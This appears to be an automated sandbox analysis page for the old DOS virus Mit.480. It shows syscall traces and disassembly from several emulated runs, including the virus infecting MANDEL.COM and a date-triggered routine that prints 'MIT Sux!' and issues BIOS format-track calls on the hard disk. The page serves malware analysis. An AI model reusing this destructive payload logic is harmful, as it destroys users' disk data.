Sample viewer

vx.netlux.org/Virus.DOS.Mit.480

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:43.815713452Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
0x12a98: jne 0x12ac1
0x12a9a: cmp dl, 1
0x12a9d: jne 0x12ac1
0x12a9f: lea dx, word ptr [0x128]
0x12aa3: mov ah, 9
0x12aa5: int 0x21
0x12aa7: mov ah, 5
0x12aa9: mov al, 2
0x12aab: mov ch, 0
0x12aad: mov dh, 0
0x12aaf: mov dl, 0x80
0x12ab1: int 0x13
0x12ab3: mov ah, 6
0x12ab5: int 0x13
0x12ab7: mov ah, 5
0x12ab9: mov dl, 0
0x12abb: int 0x13
0x12abd: mov ah, 0x4c
0x12abf: int 0x21
2018-12-17T23:01:43.81815121Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:01:43.819261333Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:01:43.82027781Z 26 PC: 12af2 | Set disk transfer address
2018-12-17T23:01:43.825604335Z 78 PC: 12afc | Find first file
2018-12-17T23:01:43.830906144Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.832921973Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.835866603Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.838536738Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.84112776Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.844152983Z 67 PC: 12b49 | Get or set file attributes
2018-12-17T23:01:43.849960567Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T23:01:43.866031415Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:43.870161652Z 87 PC: 12b61 | Get or set file date and time
2018-12-17T23:01:43.871733743Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-17T23:01:43.875947976Z 66 PC: 12b84 | Move file pointer
2018-12-17T23:01:43.877314366Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-17T23:01:43.883584832Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-17T23:01:43.892145351Z 66 PC: 12bb8 | Move file pointer
2018-12-17T23:01:43.893394341Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
0x12bc2: call 0x22a46
0x12bc5: mov ah, 0x40
0x12bc7: lea dx, word ptr [0x100]
0x12bcb: mov cx, 0x1e0
0x12bce: int 0x21
0x12bd0: jb 0x12c13
0x12bd2: cmp ax, 0x1e0
0x12bd5: jne 0x12c13
0x12bd7: jmp 0x12be4
0x12bd9: mov al, 0
0x12bdb: iret
0x12bdc: sub byte ptr [di + 0x4d88], cl
0x12be0: push bp
0x12be1: add word ptr [bx + 0x11], dx
0x12be4: mov ax, 0x5701
0x12be7: mov cx, word ptr [0x29c]
0x12beb: mov dx, word ptr [0x29e]
0x12bef: and cl, 0xe0
0x12bf2: or cl, 0x1f
2018-12-17T23:01:43.897476174Z 25 PC: 12a5a | Get default drive
2018-12-17T23:01:43.898381773Z 14 PC: 12a60 | Set default drive (Drive = 'ˆ')
2018-12-17T23:01:43.899391663Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-17T23:01:43.906549275Z 87 PC: 12bf7 | Get or set file date and time
2018-12-17T23:01:43.911096275Z 62 PC: 12bfb | Close file
2018-12-17T23:01:43.918448154Z 26 PC: 12c02 | Set disk transfer address
2018-12-17T23:01:43.919488758Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.826559897Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
0x12a98: jne 0x12ac1
0x12a9a: cmp dl, 1
0x12a9d: jne 0x12ac1
0x12a9f: lea dx, word ptr [0x128]
0x12aa3: mov ah, 9
0x12aa5: int 0x21
0x12aa7: mov ah, 5
0x12aa9: mov al, 2
0x12aab: mov ch, 0
0x12aad: mov dh, 0
0x12aaf: mov dl, 0x80
0x12ab1: int 0x13
0x12ab3: mov ah, 6
0x12ab5: int 0x13
0x12ab7: mov ah, 5
0x12ab9: mov dl, 0
0x12abb: int 0x13
0x12abd: mov ah, 0x4c
0x12abf: int 0x21
2018-12-25T12:39:39.830133846Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:39:39.831878013Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:39:39.833362624Z 26 PC: 12af2 | Set disk transfer address
2018-12-25T12:39:39.834688407Z 78 PC: 12afc | Find first file
2018-12-25T12:39:39.842526482Z 79 PC: 12b22 | Find next file
2018-12-25T12:39:39.847187515Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.856488447Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.863077223Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.86577024Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.868631659Z 67 PC: 12b49 | Get or set file attributes
2018-12-25T12:39:39.875717636Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T12:39:39.893328747Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:39:39.900776964Z 87 PC: 12b61 | Get or set file date and time
2018-12-25T12:39:39.903303341Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-25T12:39:39.924166758Z 66 PC: 12b84 | Move file pointer
2018-12-25T12:39:39.926157974Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-25T12:39:39.935666607Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:39.944667064Z 66 PC: 12bb8 | Move file pointer
2018-12-25T12:39:39.946243296Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
0x12bc2: call 0x22a46
0x12bc5: mov ah, 0x40
0x12bc7: lea dx, word ptr [0x100]
0x12bcb: mov cx, 0x1e0
0x12bce: int 0x21
0x12bd0: jb 0x12c13
0x12bd2: cmp ax, 0x1e0
0x12bd5: jne 0x12c13
0x12bd7: jmp 0x12be4
0x12bd9: mov al, 0
0x12bdb: iret
0x12bdc: sub byte ptr [di + 0x4d88], cl
0x12be0: push bp
0x12be1: add word ptr [bx + 0x11], dx
0x12be4: mov ax, 0x5701
0x12be7: mov cx, word ptr [0x29c]
0x12beb: mov dx, word ptr [0x29e]
0x12bef: and cl, 0xe0
0x12bf2: or cl, 0x1f
2018-12-25T12:39:39.949055924Z 25 PC: 12a5a | Get default drive
2018-12-25T12:39:39.951199396Z 14 PC: 12a60 | Set default drive (Drive = '“')
2018-12-25T12:39:39.952572237Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:39.962633269Z 87 PC: 12bf7 | Get or set file date and time
2018-12-25T12:39:39.964983301Z 62 PC: 12bfb | Close file
2018-12-25T12:39:39.973744238Z 26 PC: 12c02 | Set disk transfer address
2018-12-25T12:39:39.97503537Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.836668542Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
0x12a98: jne 0x12ac1
0x12a9a: cmp dl, 1
0x12a9d: jne 0x12ac1
0x12a9f: lea dx, word ptr [0x128]
0x12aa3: mov ah, 9
0x12aa5: int 0x21
0x12aa7: mov ah, 5
0x12aa9: mov al, 2
0x12aab: mov ch, 0
0x12aad: mov dh, 0
0x12aaf: mov dl, 0x80
0x12ab1: int 0x13
0x12ab3: mov ah, 6
0x12ab5: int 0x13
0x12ab7: mov ah, 5
0x12ab9: mov dl, 0
0x12abb: int 0x13
0x12abd: mov ah, 0x4c
0x12abf: int 0x21
2018-12-25T12:39:39.84041651Z 9 PC: 12aa7 | Display string (String= 'MIT Sux! ')
2018-12-25T12:39:39.846779532Z 76 PC: 12ac1 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.926579317Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
0x12a98: jne 0x12ac1
0x12a9a: cmp dl, 1
0x12a9d: jne 0x12ac1
0x12a9f: lea dx, word ptr [0x128]
0x12aa3: mov ah, 9
0x12aa5: int 0x21
0x12aa7: mov ah, 5
0x12aa9: mov al, 2
0x12aab: mov ch, 0
0x12aad: mov dh, 0
0x12aaf: mov dl, 0x80
0x12ab1: int 0x13
0x12ab3: mov ah, 6
0x12ab5: int 0x13
0x12ab7: mov ah, 5
0x12ab9: mov dl, 0
0x12abb: int 0x13
0x12abd: mov ah, 0x4c
0x12abf: int 0x21
2018-12-25T12:39:39.929626521Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:39:39.930971603Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:39:39.932256722Z 26 PC: 12af2 | Set disk transfer address
2018-12-25T12:39:39.934367901Z 78 PC: 12afc | Find first file
2018-12-25T12:39:39.941847459Z 79 PC: 12b22 | Find next file
2018-12-25T12:39:39.9444341Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.947016753Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.950362562Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.95324661Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.956365516Z 67 PC: 12b49 | Get or set file attributes
2018-12-25T12:39:39.964070474Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T12:39:39.98249685Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:39:39.99001521Z 87 PC: 12b61 | Get or set file date and time
2018-12-25T12:39:39.992166396Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-25T12:39:39.999222414Z 66 PC: 12b84 | Move file pointer
2018-12-25T12:39:40.000811706Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-25T12:39:40.01068177Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:40.020533774Z 66 PC: 12bb8 | Move file pointer
2018-12-25T12:39:40.022366632Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
0x12bc2: call 0x22a46
0x12bc5: mov ah, 0x40
0x12bc7: lea dx, word ptr [0x100]
0x12bcb: mov cx, 0x1e0
0x12bce: int 0x21
0x12bd0: jb 0x12c13
0x12bd2: cmp ax, 0x1e0
0x12bd5: jne 0x12c13
0x12bd7: jmp 0x12be4
0x12bd9: mov al, 0
0x12bdb: iret
0x12bdc: sub byte ptr [di + 0x4d88], cl
0x12be0: push bp
0x12be1: add word ptr [bx + 0x11], dx
0x12be4: mov ax, 0x5701
0x12be7: mov cx, word ptr [0x29c]
0x12beb: mov dx, word ptr [0x29e]
0x12bef: and cl, 0xe0
0x12bf2: or cl, 0x1f
2018-12-25T12:39:40.025871868Z 25 PC: 12a5a | Get default drive
2018-12-25T12:39:40.027138095Z 14 PC: 12a60 | Set default drive (Drive = '“')
2018-12-25T12:39:40.028442884Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:40.036095439Z 87 PC: 12bf7 | Get or set file date and time
2018-12-25T12:39:40.038555274Z 62 PC: 12bfb | Close file
2018-12-25T12:39:40.047643239Z 26 PC: 12c02 | Set disk transfer address
2018-12-25T12:39:40.050000003Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')